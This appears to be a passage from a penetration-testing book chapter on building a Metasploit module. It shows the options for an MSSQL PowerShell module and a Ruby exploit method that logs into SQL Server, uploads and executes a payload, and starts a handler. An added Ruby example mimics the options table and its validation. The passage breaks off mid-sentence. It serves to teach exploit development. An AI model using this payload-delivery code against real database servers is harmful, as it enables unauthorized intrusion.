Building Your Own Module

Module options:

   Name           Current Setting  Required  Description
   ----           ---------------  --------  -----------
   PASSWORD                        no        The password for the specified username
   RHOST                           yes       The target address
   RPORT          1433             yes       The target port
   USERNAME       sa               no        The username to authenticate as
   UsePowerShell  true             no        Use PowerShell as payload delivery method instead

Recall from Chapter 5 that the show options command will display any new options that have been added to an exploit. After we set these options, they will be stored within Metasploit as valid options.
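To make the options table above concrete, here is a small stand-in for a module's option registry, written for this page as an added example; it is not code from the book or from Metasploit, and its class and method names are this example's own rather than the framework's API. It registers the five options listed for mssql_powershell.rb with their defaults, renders the same four-column layout that show options prints, and checks the Required column before a run is allowed, which is the reason the console refuses to run a module whose RHOST was never set. The 192.0.2.10 address is a constructed TEST-NET value.

```ruby
# Added example: a minimal option registry mirroring the `show options` table.
# Not Metasploit's own code; names below are this example's, not the framework's.

ModuleOption = Struct.new(:name, :default, :required, :description)

class OptionTable
  attr_reader :datastore

  def initialize(options)
    @options   = options   # Array of ModuleOption
    @datastore = {}        # name => current setting, like the module datastore
    options.each { |o| @datastore[o.name] = o.default unless o.default.nil? }
  end

  # Equivalent of `set NAME VALUE`; unknown names are rejected so a typo
  # (RHOSTS vs RHOST) cannot silently create a key the module never reads.
  def set(name, value)
    raise ArgumentError, "unknown option #{name}" unless @options.any? { |o| o.name == name }
    @datastore[name] = value
  end

  # Names of required options that are still unset or empty.
  def missing_required
    @options.select { |o| o.required && @datastore[o.name].to_s.empty? }.map(&:name)
  end

  def valid?
    missing_required.empty?
  end

  # Renders the Name / Current Setting / Required / Description layout as lines.
  def render
    rows = @options.map do |o|
      [o.name, @datastore[o.name].to_s, o.required ? 'yes' : 'no', o.description]
    end
    header = ['Name', 'Current Setting', 'Required', 'Description']
    widths = header.each_index.map { |i| ([header] + rows).map { |r| r[i].length }.max }
    fmt = ->(r) { r.each_with_index.map { |c, i| c.ljust(widths[i]) }.join('  ').rstrip }
    [fmt.call(header), fmt.call(widths.map { |w| '-' * w })] + rows.map { |r| fmt.call(r) }
  end
end

# Constructed to mirror the options table shown above for mssql_powershell.rb.
MSSQL_POWERSHELL_OPTIONS = [
  ModuleOption.new('PASSWORD',      nil,  false, 'The password for the specified username'),
  ModuleOption.new('RHOST',         nil,  true,  'The target address'),
  ModuleOption.new('RPORT',         1433, true,  'The target port'),
  ModuleOption.new('USERNAME',      'sa', false, 'The username to authenticate as'),
  ModuleOption.new('UsePowerShell', true, false, 'Use PowerShell as payload delivery method instead'),
]

def build_table
  OptionTable.new(MSSQL_POWERSHELL_OPTIONS)
end

if __FILE__ == $PROGRAM_NAME
  t = build_table
  puts t.render
  puts "missing: #{t.missing_required.inspect}"  # RHOST has no default
  t.set('RHOST', '192.0.2.10')                    # constructed TEST-NET address
  puts "valid after set: #{t.valid?}"
end
```

Only RHOST reports as missing on a fresh table, because RPORT already carries its 1433 default; once RHOST is set the table validates, and setting a misspelled name raises instead of being accepted.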

Now we’ll finalize the mssql_powershell.rb file, which we have been editing since the beginning of this chapter, before we edit mssql.rb (which will be explained shortly).

When you examine the exploits in the modules directory inside Metasploit (modules/exploits, modules/auxiliary/, and so on), you’ll notice that most of them have the same overall structure (def exploit as an example). Remember always to comment your code to give other developers an idea of what it’s doing! In the following listing, we first introduce our def exploit line, which defines what we’ll be doing in our exploit. We’ll frame our exploit the same way as the other modules and add a few new sections, as explained next:

     def exploit
          # If the username/password from the datastore don't log in, report it and stop
          if (not mssql_login_datastore)
               print_status("Invalid SQL Server credentials")
               return
          end

          # Use the PowerShell method for payload delivery when UsePowerShell is set
          if (datastore['UsePowerShell'])
               powershell_upload_exec(Msf::Util::EXE.to_win32pe(framework, payload.encoded))
          end

          # Start the payload handler, then close the MSSQL connection
          handler
          disconnect
     end
end

The module first checks whether we are logged in, using the mssql_login_datastore call in the first if block. If we aren’t logged in, the error message "Invalid SQL Server credentials" is displayed and the method returns. The UsePowerShell check in the second if block is used to call the function powershell_upload_exec, which will automatically create a Metasploit-based payload that we specify